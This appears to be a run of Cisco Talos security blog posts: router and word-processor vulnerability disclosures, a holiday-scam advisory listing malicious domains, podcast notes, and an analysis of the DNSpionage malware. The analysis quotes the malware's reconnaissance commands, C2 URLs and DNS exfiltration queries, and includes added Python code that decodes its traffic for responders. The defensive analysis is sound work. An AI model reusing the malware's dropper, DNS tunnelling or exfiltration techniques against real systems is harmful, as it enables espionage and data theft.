
Vulnerability Spotlight: Multiple remote vulnerabilities in TP-Link TL-R600VPN


Vulnerabilities discovered by Jared Rittle of Cisco Talos.

Cisco Talos is disclosing multiple vulnerabilities in the TP-Link TL-R600VPN router. TP-Link produces a number of different types of small and home office (SOHO) routers. Talos discovered several bugs in this particular router model that could lead to remote code execution.

Overview


There are two root causes of the vulnerabilities: a lack of input sanitisation and parsing errors. The lack of proper input sanitisation leads to the vulnerabilities TALOS-2018-0617/18, which can be exploited without authentication. Parsing errors are responsible for the vulnerabilities TALOS-2018-0619/20; these can only be exploited with an authenticated session. The remote code execution takes place in the context of HTTPD. However, since the HTTPD process is running as root, an attacker can run code with elevated privileges.

All vulnerabilities were found on HWv3 FRNv1.3.0 and HWv2 FRNv1.2.3, except for TALOS 2018-0620, which was found only on HWv3 FRNv1.3.0.

TALOS-2018-0617 — TP-Link TL-R600VPN HTTP denial of service


An exploitable denial-of-service vulnerability exists in the URI-parsing function of the TP-Link TL-R600VPN HTTP server. If a directory traversal is attempted on any of the vulnerable pages (help, images, frames, dynaform, localization) and the requested page is a directory instead of a file, the web server will enter an infinite loop, making the management portal unavailable. This request doesn't need to be authenticated.

CVE: CVE-2018-3948

A full technical advisory is available here.

TALOS-2018-0618 — TP-Link TL-R600VPN HTTP server information disclosure


An exploitable information disclosure vulnerability exists in the HTTP server functionality of the TP-Link TL-R600VPN. A directory traversal vulnerability exists in the TP-Link TL-R600VPN in both authenticated and unauthenticated forms. If a standard directory traversal is used with a base page of 'help,' the traversal does not require authentication and can read any file on the system.

CVE: CVE-2018-3949

A full technical advisory is available here.

TALOS-2018-0619 — TP-Link TL-R600VPN HTTP server ping address remote code execution


An exploitable remote code execution vulnerability exists in the ping and traceroute functions of the TP-Link TL-R600VPN HTTP server. The router does not check the size of the data passed to its 'ping_addr' field when performing a ping operation. By sending a large amount of data to this field, an attacker could cause a stack-based buffer overflow, leading to remote code execution or a simple crash of the device's HTTP server. An attacker would need to be in an authenticated session to trigger this vulnerability.

CVE: CVE-2018-3950

A full technical advisory is available here.

TALOS-2018-0620 — TP-Link TL-R600VPN HTTP server fs directory remote code execution


An exploitable remote code execution vulnerability exists in the HTTP header-parsing function of the TP-Link TL-R600VPN HTTP server. A specially crafted HTTP request can cause a buffer overflow, resulting in remote code execution on the device. During this process, the server calculates the length of the user-controlled HTTP header buffer and adds the value to the input buffer offset. This creates an overflow condition when the router processes a longer-than-expected GET request. An attacker needs to be authenticated to be able to trigger this vulnerability.

CVE: CVE-2018-3951

A full technical advisory is available here.

Discussion


Over the past year, Talos has disclosed various vulnerabilities in internet-of-things (IoT) devices and SOHO routers. These are just the latest examples showing that these pieces of equipment are not only vulnerable, but also lack the generic operating system protections that mitigate vulnerabilities like buffer overflows. Fortunately, in the case of TL-R600VPN routers, the critical vulnerabilities that lead to remote code execution require authentication. However, the code could be executed with root privileges.


Coverage


The following Snort IDs have been released to detect these vulnerabilities:


What scams shoppers should look out for on Black Friday and Cyber Monday

Every year, more and more Americans are taking care of their holiday shopping on Cyber Monday.

Last year, consumers spent a record $6.59 billion during the annual online shopping day, an all-time record, according to Adobe Insights. Still, that doesn’t mean no one is rushing out the night of Thanksgiving to do their shopping. Shoppers still went out in droves on Black Friday last year — Adobe estimated that Americans spent $2.43 billion on Nov. 25, 2017.

These two frenzied days open the door for bad actors to take advantage, hoping to trick uneducated consumers into clicking on malicious ads (a.k.a. malvertising) and emails disguised as shopping deals to phish credit card and personal information. Last year, 71 percent of emails that mentioned either “Black Friday” or “Cyber Monday” by name were classified as spam by Cisco Talos. Of that spam, 96 percent of the emails came from uncommon top-level domains (TLDs) such as .top, .stream, .trade and .bid.

One of the most prevalent domains associated with these emails is hxxp://bags-black-friday[.]top, which utilized the "hailstorm" method. This means that the attacker registered many domains and used them to send hundreds of spam emails in a matter of minutes, only to never use those domains again. Since those domains have no history in detection software, they can easily blow by security systems and land in users' inboxes. The Cisco Umbrella data for bags-black-friday is below.



Based on last year’s metrics, Talos believes that there will be a similar spike in these kinds of emails after the holiday shopping season kicks off.

Talos has also seen several malicious sites hoping to capitalize on Black Friday and Cyber Monday. We have blacklisted several sites that contain either “Black Friday” or “Cyber Monday” directly in the URL name, indicating that attackers are hoping to draw customers in who are looking for deals specific to those shopping days. A complete list of these domains is in the “IOCs” section below.

Some of these URLs reference popular stores that often run sales, such as J.C. Penney and Pandora jewelry. There are several other malicious URLs that mention these holidays but have been inactive for an extended period of time as of Nov. 14. As we get closer to Thanksgiving, we anticipate that the number of URLs targeted at shoppers will rise, as well. It is typical of attackers to set up these malicious sites just as the shopping days are arriving, hoping to show up in internet searches and bypass the usual detection, as with the email campaigns mentioned above.

There are also specific malware attacks that have tried to capitalize on these "holidays." For example, Microsoft discovered a malware campaign in 2016 that disguised itself as a special deal from online retailer Amazon and downloaded the Locky ransomware onto victims' machines. Locky is a ransomware that's been spread for years, mainly through email campaigns. Once launched, the malware will encrypt users' files and ask for a payment in order to return the files. However, the threat of Locky has largely been wiped out by antivirus detection engines over the past year. (If you happen to be infected with Locky, we have an open-source decryptor here called "LockyDump" that can help you recover your files.)

With these numbers in mind, Talos recommends that shoppers take the following advice when planning to shop on Black Friday and Cyber Monday to protect themselves from common scams:

  • Ensure that you are only downloading apps from trusted and official app stores like the Google Play store and iOS App Store. 
  • Look out for apps that ask for suspicious permissions, such as access to your text messages, contacts, stored passwords and administrative features.
  • Some malicious apps will try to masquerade as a legitimate version of the one you could be searching for. Signs of these apps include poor spelling and grammar in app descriptions and interfaces, lack of high-quality performance and a developer contact that uses a free email service (such as @gmail.com).
  • Avoid clicking on unsolicited emails. Make sure that you purposely subscribed to any marketing emails you are receiving from retailers.
  • Do not click on any files from untrusted sources. These often contain files that will execute unwanted programs on your machine.
  • Use an ad blocker locally on your browser. These will often block any malvertising campaigns that aim to capitalize on shoppers looking for deals.
  • Try to use payment services such as Google Pay, Samsung Pay and Apple Pay. These services use tokenization instead of the “Primary Account Number” (your credit card number), making your transaction more secure.
  • Use complex passwords that are unique, per site. Attackers commonly reuse passwords as a way to compromise multiple accounts with the same username.
  • If a deal sounds too good to be true, it probably is.

Our customers can detect and block these kinds of threats, as well, through a variety of our products.

IOCs

americanas-seguranca-blackfriday[.]oni[.]cc
blackfriday-deal-uk[.]com
blackfriday-shoping[.]com
blackfriday-uk-deal[.]com
blackfridaydiscountmuch[.]com
blackfridayonlineshoping[.]com
blackfridaysofasale[.]com
centralatendimento-2016-blackfriday[.]com[.]br[.]fewori20.mobi
discount-blackfriday[.]shop
discountblackfriday[.]shop
downloadfileshere[.]com/get/odelldaigneault.nm.ru_black-friday_Downloader_8911010.exe
jcpenney[.]black[.]friday[.]sales[.]cybersmondaydeals.com
mariiusblog[.]blogspot[.]com/search/label/reduceri%20black%20friday%202014
pandora-blackfriday-deal[.]com
ricardoeletro-blackfriday[.]com[.]br[.]dosd23-0[.]mobi
sale-blackfriday[.]shop
saleblackfriday[.]shop
shopblackfriday[.]shop
ssl-dados-blackfriday-ricardoeletro[.]com[.]br[.]dsdkowie0930[.]net/produtos/32882479/PlayStation-3-250GB-HD-Controle-Dual-Shock-3-Preto-Sem-Fio-Produto-Oficial-Sony-Compacto-03-Super-Jogos
Uk-blackfriday[.]com
jcpenney[.]black[.]friday[.]sales[.]cybersmondaydeals[.]com

Vulnerability Spotlight: Multiple remote code execution vulnerabilities in Atlantis Word Processor


A member of Cisco Talos discovered these vulnerabilities.

Executive summary

Today, Cisco Talos is disclosing three remote code execution vulnerabilities in the Atlantis Word Processor. Atlantis Word Processor is a traditional word processor that provides a number of basic features for users, in line with what is in other similar types of software. This application is written in Delphi and keeps the majority of its capabilities in a single, relocatable binary. An attacker could exploit these vulnerabilities to corrupt the memory of the application, which can result in remote code execution under the context of the application.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Atlantis to ensure that these issues are resolved and that an update is available for affected customers.


Vulnerability details

Atlantis Word Processor open document format NewAnsiString length remote code execution vulnerability (TALOS-2018-0711/CVE-2018-4038)

The word processor contains an exploitable arbitrary write vulnerability in the open document format parser while trying to null-terminate a string. A specially crafted document could allow an attacker to pass an untrusted value as a length to a constructor, which miscalculates a length and then uses it to calculate the position to write a null byte. This particular bug lies in the `NewAnsiString` function.

For more information on this vulnerability, read the full advisory here.

Atlantis Word Processor Huffman table code length remote code execution vulnerability (TALOS-2018-0712/CVE-2018-4039)

Atlantis Word Processor contains an out-of-bounds write vulnerability in its PNG implementation. When opening a specially crafted document, which would need to be supplied by an attacker, the application fingerprints it in order to determine the correct file format parser. Eventually, an attacker could corrupt memory, which would allow them to execute arbitrary code in the context of the application. A user only needs to open the document to trigger this vulnerability.

For more information on this vulnerability, read the full advisory here.

Atlantis Word Processor rich text format uninitialized TAutoList remote code execution vulnerability (TALOS-2018-0713/CVE-2018-4040)

An exploitable uninitialized pointer vulnerability exists in the rich text format parser of Atlantis Word Processor. A specially crafted document can cause certain RTF tokens to dereference an uninitialized pointer and then write to it. When opening up an RTF document, the application will first fingerprint it in order to determine the correct file format parser. Eventually, this would corrupt the memory of the application, allowing a user to execute code in the context of the application.

For more information on this vulnerability, read the full advisory here.

Versions tested

Talos tested and confirmed that Atlantis Word Processor, version 3.2.7.2 is affected by these vulnerabilities.

Conclusion

All three of these vulnerabilities are triggered by the user opening a malicious, specially crafted document. The easiest way to avoid these issues is for the user to ensure that they don’t open any documents from untrusted sources. The latest update from Atlantis will also cover these vulnerabilities, as will the Snort rules listed below.


Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 48385, 48386, 48389 - 48392

Beers with Talos EP42: To the Moon, Everyone!



Beers with Talos (BWT) Podcast Ep. #42 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Ep. #42 show notes: 

Recorded Nov. 16, 2018 —

Cyber moonshot, baby! It’s just like that time the US raced everyone to the moon, except completely different and in-no-way related! Do we need a “cyber moonshot”? Is the plan that was just released the way to get there? ...and holy crap if Craig didn’t actually prepare for this podcast with notes and everything.

We hope that you enjoy our rants over the Thanksgiving holiday break (for our American friends) or just at work like usual for the rest of you that don’t have a four day weekend ahead. We are genuinely grateful for you, listeners, as the entire reason that we get to keep doing this podcast. We enjoy having fun spreading the word on security and calling out excellence where we find it.

The timeline:

The topics

01:00 - Roundtable - Hi, Ellen. Enjoy your swag. Also, transition programs for vets we are supporting
12:26 - The Cyber Moonshot! That’s really all we talk about the whole hour. I know we mentioned other topics, but we just ranted way too long on the first topic.
1:00:19 - Closing thoughts and parting shots

The links

Cyber Moonshot draft report (public link)

==========

Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
Hosted by Mitch Neff (@MitchNeff).
Find all episodes here.

Subscribe via iTunes (and leave a review!)

Check out the Talos Threat Research Blog

Subscribe to the Threat Source newsletter

Follow Talos on Twitter

Give us your feedback and suggestions for topics:
beerswithtalos@cisco.com

DNSpionage Campaign Targets Middle East

This blog post was authored by Warren Mercer and Paul Rascagneres.

Update 2018-11-27 15:30:00 EDT: A Russian-language document has been removed. Subsequent analysis leads us to believe it is unrelated to this investigation.

Executive Summary


Cisco Talos recently discovered a new campaign targeting Lebanon and the United Arab Emirates (UAE) affecting .gov domains, as well as a private Lebanese airline company. Based on our research, it's clear that this adversary spent time understanding the victims' network infrastructure in order to remain under the radar and act as inconspicuous as possible during their attacks.

Based on this actor's infrastructure and TTPs, we haven't been able to connect them with any other campaign or actor that's been observed recently. This particular campaign utilizes two fake, malicious websites containing job postings that are used to compromise targets via malicious Microsoft Office documents with embedded macros. The malware utilized by this actor, which we are calling "DNSpionage," supports HTTP and DNS communication with the attackers.

In a separate campaign, the attackers used the same IP to redirect the DNS of legitimate .gov and private company domains. During each DNS compromise, the actor carefully generated Let's Encrypt certificates for the redirected domains. Let's Encrypt provides X.509 certificates for TLS free of charge to the user. We don't know at this time if the DNS redirections were successful.

In this post, we will break down the attackers' methods and show how they used malicious documents to attempt to trick users into opening malicious websites that are disguised as "help wanted" sites for job seekers. Additionally, we will describe the malicious DNS redirection and the timeline of the events.




Infection vectors

Fake job websites


The attackers' first attempt to compromise the user involved two malicious websites that mimicked legitimate sites that host job listings:

  • hr-wipro[.]com (with a redirection to wipro.com)
  • hr-suncor[.]com (with a redirection to suncor.com)

These sites hosted a malicious Microsoft Office document: hxxp://hr-suncor[.]com/Suncor_employment_form[.]doc.

The document is a copy of a legitimate file available on the website for Suncor Energy, a Canadian sustainable energy company, and contains a malicious macro.

At this time, we don't know how the target received these links. The attackers most likely sent the malicious document via email as part of a spear-phishing campaign, but it also could have circulated via social media platforms, such as LinkedIn, in an attempt to legitimize the opportunity for a new job.

Malicious Office document


Upon opening the first Office document, the user receives a message that says "Content Mode Available:"

Macros used


The macros of the analysed samples can be divided into two steps:
  1. When the document is opened, the macro will decode a PE file encoded with base64 and will drop it in %UserProfile%\.oracleServices\svchost_serv.doc
  2. When the document is closed, the macro will rename the file "svchost_serv.doc" to "svchost_serv.exe." Then, the macro creates a scheduled task named "chromium updater v 37.5.0" in order to execute the binary. The scheduled task is executed immediately and repeatedly every minute.
The purpose of these two steps is to avoid sandbox detection.

The payload is executed when Microsoft Office is closed, meaning it requires human interaction to deploy it. The macros, while available through analysis, are also password-protected in Microsoft Word to stop the victim from exploring the macro code via Microsoft Office.

Additionally, the macro uses classical string obfuscation in order to avoid strings detection:

The "schedule.service" string is created by concatenation. The final payload is a remote administration tool that we named "DNSpionage."

DNSpionage malware


Malware analysis


The malware dropped by the malicious document is an undocumented remote administration tool. We are naming it DNSpionage due to the fact that it supports DNS tunneling as a covert channel to communicate with the attackers' infrastructure.

DNSpionage creates its own data in the running directory:
%UserProfile%\.oracleServices/
%UserProfile%\.oracleServices/Apps/
%UserProfile%\.oracleServices/Configure.txt
%UserProfile%\.oracleServices/Downloads/
%UserProfile%\.oracleServices/log.txt
%UserProfile%\.oracleServices/svshost_serv.exe
%UserProfile%\.oracleServices/Uploads/
The Downloads directory is used by the attackers to store additional scripts and tools downloaded from the C2 server.

The Uploads directory is used by the attacker to temporarily store files before exfiltrating them to the C2 server.

The log.txt file contains logs in plain text.

All the executed commands can be logged in this file; it also contains the results of the commands.

The last file is Configure.txt. As expected, this file contains the malware configuration. The attackers can specify a custom command and control (C2) server URL, a URI and a domain that serves as a DNS covert channel. Additionally, the attackers can specify a custom base64 alphabet for obfuscation. We discovered that the attackers used a custom alphabet for each target.

All the data is transferred in JSON. That's why a large part of the code of the malware is the JSON library.

Communication Channels


The malware uses HTTP and DNS in order to communicate with the C2 server.

HTTP mode


A DNS request (to 0ffice36o[.]com) is performed with random data encoded with base64. This request registers the infected system and receives the IP of an HTTP server (185.20.184.138 during the investigation). An example of a DNS request:
yyqagfzvwmd4j5ddiscdgjbe6uccgjaq[.]0ffice36o[.]com
The malware is able to craft DNS requests used to provide the attacker with further information. Here is an example of request:
oGjBGFDHSMRQGQ4HY000[.]0ffice36o[.]com
In this context, the first four characters are randomly generated by the malware using rand(). The rest of the label is encoded in base32; once decoded, the value is 1Fy2048. "Fy" is the target ID and "2048" (0x800) means "Config file not found". The request is performed if the configuration file was not retrieved on the infected machine. This message is used to inform the attacker.

The malware performs an initial HTTP request to retrieve its configuration at hxxp://IP/Client/Login?id=Fy.

This request will be used to create the configuration file, particularly to set the custom base64 dictionary.

The second HTTP request is hxxp://IP/index.html?id=XX (where "XX" is the ID for the infected system)

The purpose of this request is to retrieve the orders. The site is a fake Wikipedia page:

The commands are included in the source code of the page:

In this example, the commands are encoded with a standard base64 algorithm because we did not receive a custom alphabet. Here is another example with a custom alphabet in the configuration file:

Here are the three commands automatically sent to the compromised system:

  • {"c": "echo %username%", "i": "-4000", "t": -1, "k": 0}
  • {"c": "hostname", "i": "-5000", "t": -1, "k": 0}
  • {"c": "systeminfo | findstr /B /C:\"Domain\"", "i": "-6000", "t": -1, "k": 0}

The malware generates the following snippet of code after executing those commands:

The attackers ask for the username and hostname to retrieve the infected user's domains. The first step is clearly a reconnaissance phase. The data is eventually sent to hxxp://IP/Client/Upload.

Finally, CreateProcess() executes the commands, and the output is redirected to a pipe to the malware created with CreatePipe().
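The HTTP mode described above delivers orders as base64-encoded JSON embedded in a fake page, and the configuration step can replace the standard base64 alphabet with a per-target one. The following added example (not code from the Talos report or from the malware) shows how an analyst can recover the orders once the custom alphabet has been pulled from Configure.txt: the custom alphabet is mapped back onto the standard one with a translation table, and each decoded JSON object is parsed. The alphabet `CUSTOM_ALPHABET` and the blob layout (one base64 string per order) are constructed assumptions; the three reconnaissance orders are the ones quoted in the report.

```python
import base64
import json
import string

# Standard base64 alphabet (RFC 4648). The malware substitutes a per-target
# permutation of these 64 symbols when one is present in Configure.txt.
STANDARD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"

# Constructed example alphabet: a rotation of the standard one. The real
# per-target alphabets are not reproduced in the report; this is a stand-in.
CUSTOM_ALPHABET = STANDARD_ALPHABET[17:] + STANDARD_ALPHABET[:17]


def validate_alphabet(alphabet: str) -> None:
    """A usable alphabet is a permutation of the 64 standard symbols."""
    if len(alphabet) != 64 or sorted(alphabet) != sorted(STANDARD_ALPHABET):
        raise ValueError("alphabet must be a permutation of the 64 base64 symbols")


def decode_custom_base64(blob: str, alphabet: str = STANDARD_ALPHABET) -> bytes:
    """Translate blob from the custom alphabet to the standard one, then decode.

    '=' padding is left untouched: it is not one of the 64 alphabet symbols.
    validate=True makes stray characters an error instead of silently dropped.
    """
    validate_alphabet(alphabet)
    table = str.maketrans(alphabet, STANDARD_ALPHABET)
    return base64.b64decode(blob.translate(table), validate=True)


def encode_custom_base64(data: bytes, alphabet: str = STANDARD_ALPHABET) -> str:
    """Inverse of decode_custom_base64; used here only to build sample input."""
    validate_alphabet(alphabet)
    table = str.maketrans(STANDARD_ALPHABET, alphabet)
    return base64.b64encode(data).decode("ascii").translate(table)


def parse_orders(blobs, alphabet: str = STANDARD_ALPHABET):
    """Decode each encoded order and parse the JSON object the C2 sends.

    Each order carries "c" (the command line to run) and "i" (an order id),
    plus "t" and "k", whose exact meaning the report does not spell out.
    Entries that do not decode to a JSON object with "c" and "i" are skipped,
    which is what you want when scraping a retrieved page with the wrong
    alphabet: you get an empty list rather than a traceback.
    """
    orders = []
    for blob in blobs:
        try:
            order = json.loads(decode_custom_base64(blob, alphabet))
        except ValueError:  # covers binascii.Error, JSONDecodeError, UnicodeDecodeError
            continue
        if isinstance(order, dict) and {"c", "i"} <= order.keys():
            orders.append(order)
    return orders


# The three reconnaissance orders quoted in the report, re-encoded with the
# constructed alphabet to stand in for the page content the malware retrieves.
RECON_ORDERS = [
    {"c": "echo %username%", "i": "-4000", "t": -1, "k": 0},
    {"c": "hostname", "i": "-5000", "t": -1, "k": 0},
    {"c": 'systeminfo | findstr /B /C:"Domain"', "i": "-6000", "t": -1, "k": 0},
]
SAMPLE_BLOBS = [
    encode_custom_base64(json.dumps(order).encode("utf-8"), CUSTOM_ALPHABET)
    for order in RECON_ORDERS
]


def commands_from_sample():
    """The command lines recovered from SAMPLE_BLOBS with the right alphabet."""
    return [order["c"] for order in parse_orders(SAMPLE_BLOBS, CUSTOM_ALPHABET)]


if __name__ == "__main__":
    for blob, cmd in zip(SAMPLE_BLOBS, commands_from_sample()):
        print(f"{blob[:24]}... -> {cmd}")
    print("with standard alphabet:", parse_orders(SAMPLE_BLOBS))
```

Decoding the same blobs with the standard alphabet yields nothing, which is the practical symptom an analyst sees when a sample's Configure.txt has not been recovered yet.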

DNS mode


The malware also supports a DNS-only mode. In this mode, the orders and answers are handled via DNS. This option is dictated within the configure.txt file on the infected machine. Using DNS can make it easier to send information back to the attacker, as DNS traffic generally bypasses the proxies or web filtering in place.

First, the malware initiates a DNS query to ask for orders, for example:
RoyNGBDVIAA0[.]0ffice36o[.]com 
The first four characters must be ignored; as mentioned earlier in the article, these are randomly generated characters, and the relevant data is GBDVIAA0. The decoded value (base32) is "0GT\x00". GT is the target ID and \x00 the request number. The C2 server replies with an answer to the DNS request; this will be an IP address which, whilst not always a valid IP, is perfectly acceptable for the DNS protocol, for example 0.1.0.3. We believe the first value (0x0001) is the command ID for the next DNS request and 0x0003 is the size of the command.

Secondly, the malware performs a DNS query with the command ID:
t0qIGBDVIAI0[.]0ffice36o[.]com (GBDVIAI0 => "0GT\x01")
The C2 server will return a new IP: 100.105.114.0. If we convert the value to ASCII we have "dir\x00", the command to be executed.

Finally, the result of the executed command will be sent by multiple DNS requests:
gLtAGJDVIAJAKZXWY000.0ffice36o[.]com -> GJDVIAJAKZXWY000 -> "2GT\x01 Vol"
TwGHGJDVIATVNVSSA000.0ffice36o[.]com -> GJDVIATVNVSSA000 -> "2GT\x02ume"
1QMUGJDVIA3JNYQGI000.0ffice36o[.]com -> GJDVIA3JNYQGI000 -> "2GT\x03in d"
iucCGJDVIBDSNF3GK000.0ffice36o[.]com -> GJDVIBDSNF3GK000 -> "2GT\x04rive"
viLxGJDVIBJAIMQGQ000.0ffice36o[.]com -> GJDVIBJAIMQGQ000 -> "2GT\x05 C h"
[...]
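The DNS-mode exchange above can be decoded offline from passive DNS logs, which is how an incident responder reconstructs what left the network. The following added example (not code from the Talos report or from the malware) implements the decoding exactly as the report describes it: drop the four random characters, treat the '0' characters as the base32 padding the malware substitutes for '=', then split the result into message type, target ID, sequence number and payload; A-record answers are decoded either as a command-ID/length pair or as NUL-padded ASCII. The sample queries are the five quoted above, and the names `Beacon`, `reassemble_output` and the '0'/'2' message-type reading are this example's own.

```python
import base64
from typing import List, NamedTuple

# Domain used as the covert channel in the report (defanged in the page).
C2_DOMAIN = "0ffice36o.com"


class Beacon(NamedTuple):
    kind: str        # first decoded byte: '0' = request for orders, '2' = result chunk
    target_id: str   # two-character victim identifier, e.g. "GT"
    seq: int         # request number / chunk sequence, one byte
    payload: bytes   # remaining bytes (a chunk of command output)


def refang(name: str) -> str:
    """Turn the report's defanged hostnames back into plain ones."""
    return name.replace("[.]", ".")


def decode_label(label: str) -> Beacon:
    """Decode the leftmost label of a DNSpionage query.

    The first four characters are random filler from rand(); the rest is
    base32 in which the malware writes '0' where RFC 4648 would put '='
    padding ('0' never occurs in the base32 alphabet, so the swap is safe).
    """
    data = label[4:].replace("0", "=")
    raw = base64.b32decode(data, casefold=True)
    if len(raw) < 4:
        raise ValueError(f"label too short to carry a header: {label!r}")
    return Beacon(chr(raw[0]), raw[1:3].decode("ascii"), raw[3], raw[4:])


def beacon_from_query(qname: str) -> Beacon:
    """Check that qname sits under the C2 domain, then decode its first label."""
    host = refang(qname).rstrip(".")
    if not host.endswith("." + C2_DOMAIN):
        raise ValueError(f"not a {C2_DOMAIN} query: {qname!r}")
    return decode_label(host.split(".")[0])


def decode_control_answer(ip: str):
    """A-record answer to a '0' request: two 16-bit big-endian fields,
    command ID and command length (0.1.0.3 -> (1, 3))."""
    octets = bytes(int(o) for o in ip.split("."))
    return int.from_bytes(octets[:2], "big"), int.from_bytes(octets[2:], "big")


def decode_text_answer(ip: str) -> str:
    """A-record answer carrying the command itself as NUL-padded ASCII
    (100.105.114.0 -> "dir")."""
    octets = bytes(int(o) for o in ip.split("."))
    return octets.rstrip(b"\x00").decode("ascii")


def reassemble_output(qnames: List[str]) -> dict:
    """Group result chunks by target ID, order them by sequence number and
    concatenate the payloads. Returns {target_id: text}; non-result beacons
    in the input are ignored so a raw log slice can be passed in."""
    chunks = {}
    for qname in qnames:
        beacon = beacon_from_query(qname)
        if beacon.kind != "2":
            continue
        chunks.setdefault(beacon.target_id, {})[beacon.seq] = beacon.payload
    return {
        tid: b"".join(parts[i] for i in sorted(parts)).decode("ascii", "replace")
        for tid, parts in chunks.items()
    }


# The five exfiltration queries quoted in the report.
SAMPLE_QUERIES = [
    "gLtAGJDVIAJAKZXWY000.0ffice36o[.]com",
    "TwGHGJDVIATVNVSSA000.0ffice36o[.]com",
    "1QMUGJDVIA3JNYQGI000.0ffice36o[.]com",
    "iucCGJDVIBDSNF3GK000.0ffice36o[.]com",
    "viLxGJDVIBJAIMQGQ000.0ffice36o[.]com",
]

if __name__ == "__main__":
    print(beacon_from_query("RoyNGBDVIAA0[.]0ffice36o[.]com"))
    print(decode_control_answer("0.1.0.3"), decode_text_answer("100.105.114.0"))
    print(reassemble_output(SAMPLE_QUERIES))
```

Run against the five quoted queries, the chunks reassemble to " Volume in drive C h", the opening of the `dir` output the report truncates with "[...]"; the same loop over a full day of resolver logs for the C2 domain recovers everything the implant sent.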

Victimology

Thanks to the DNS exfiltration and Cisco Umbrella, we are able to identify the origin of some of the victims and the period of activity in October and November. Here is the graph for 0ffice36o[.]com, the DNS we mentioned above:


The queries were performed from Lebanon and UAE. This information is confirmed by the DNS redirection described in the next section.

DNS redirection


Introduction


Talos discovered three IPs linked to the DNSpionage domain:

  • 185.20.184.138
  • 185.161.211.72
  • 185.20.187.8

The three IPs are hosted by DeltaHost.

The last one was used in a DNS redirection attack between September and November. Multiple nameservers belonging to the public sector in Lebanon and UAE, as well as some companies in Lebanon, were apparently compromised, and hostnames under their control were pointed to attacker-controlled IP addresses. The attackers redirected the hostnames to the IP 185.20.187.8 for a short time. Just before redirecting the IP, the attackers created a certificate matching the domain name with the Let's Encrypt service.

In this section, we will present all the DNS redirection instances we identified and the attacker-generated certificates associated with each. We don't know if the redirection attack was ultimately successful, or what exact purpose the DNS redirection served. However, the impact could be significant, as the attackers were able to intercept all traffic destined for these hostnames during this time. Because the attackers targeted email and VPN traffic specifically, the redirection may have been used to harvest additional information, such as email and/or VPN credentials.

As incoming email would also be arriving at the attackers' IP address, if there was multi-factor authentication, it would allow the attackers to obtain MFA codes to abuse. Since the attackers were able to access email, they could carry out additional attacks or even blackmail the target.

The DNS redirection we identified occurs in multiple locations where there is no direct correlation of infrastructure, staff, or job routines. It also occurs in both the public and private sectors. Therefore, we believe it was not human error, nor a mistake by an administrative user within any of the impacted organisations. This was a deliberate, malicious attempt by the attackers to redirect DNS.

Lebanon government redirection


Talos identified that the Finance Ministry of Lebanon's email domain was the victim of a malicious DNS redirection.

  • webmail.finance.gov.lb was redirected to 185.20.187.8 on Nov. 6 06:19:13 GMT. On the same date at 05:07:25 a Let's Encrypt certificate was created.

UAE government redirection


UAE public domains were targeted, as well. We identified a domain from the Police (VPN and College) and the Telecommunication Regulatory Authority.

  • adpvpn.adpolice.gov.ae redirected to 185.20.187.8 on Sept. 13 at 06:39:39 GMT. The same date at 05:37:54 a Let's Encrypt certificate was created.
  • mail.mgov.ae redirected to 185.20.187.8 on Sept. 15 at 07:17:51 GMT. A Let's Encrypt certificate was also created at 06:15:51 GMT.
  • mail.apc.gov.ae redirected to 185.20.187.8 on Sept. 24. A Let's Encrypt certificate was also created at 05:41:49 GMT.

Middle East Airline redirection


Talos discovered that Middle East Airlines (MEA), a Lebanese airline, was also the victim of DNS redirection.

  • memail.mea.com.lb redirected to 185.20.187.8 on Nov. 14 at 11:58:36 GMT
    On Nov. 6, at 10:35:10 GMT, a Let's Encrypt certificate was created.


This certificate contains alternative names in the subject lines; this feature allows multiple domains to be added to the certificate for SSL activities:
  • memail.mea.com.lb
  • autodiscover.mea.com.lb
  • owa.mea.com.lb
  • www.mea.com.lb
  • autodiscover.mea.aero
  • autodiscover.meacorp.com.lb
  • mea.aero
  • meacorp.com.lb
  • memailfr.meacorp.com.lb
  • meoutlook.meacorp.com.lb
  • tmec.mea.com.lb

These domains show a clear understanding of the victims' domains, which leads us to believe the attacker was active in these environments in order to understand the specific domains and certificates they would be required to produce.

Conclusion


Our investigation discovered two events: the DNSpionage malware and a DNS redirection campaign. In the case of the malware campaign, we don't know the exact target, but we do know the attackers went after users in Lebanon and the UAE. However, as outlined above, we were able to uncover the targets of the redirect campaign.

We are highly confident that both of these campaigns came from the same actor. However, we do not know much about the location of the actors and their exact motivations. It is clear that this threat actor was able to redirect DNS from government-owned domains in two different countries over the course of two months, as well as a national Lebanese airline. They were able to work from the system's point of view by using Windows malware, as well as the network, by using DNS exfiltration and redirection. It is unclear if these DNS redirection attacks were successful, but the attackers have kept up their efforts, launching five attacks so far this year, including one in the past two weeks.

Users should use these campaigns as proof that their endpoint protection as well as the network protection need to be as strong as possible. This is an advanced actor who obviously has their sights set on some important targets, and they don't appear to be letting up any time soon.

Coverage

Snort rules 48444 and 48445 will prevent DNSpionage from making an outbound connection.

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of Compromise (IOCs)


The following IOCs are associated with various malware distribution campaigns that were observed during the analysis of associated malicious activity.

Fake job websites:


hr-wipro[.]com
hr-suncor[.]com

Malicious documents:


9ea577a4b3faaf04a3bddbfcb934c9752bed0d0fc579f2152751c5f6923f7e14 (LB submit)
15fe5dbcd31be15f98aa9ba18755ee6264a26f5ea0877730b00ca0646d0f25fa (LB submit)

DNSpionage samples:


2010f38ef300be4349e7bc287e720b1ecec678cacbf0ea0556bcf765f6e073ec
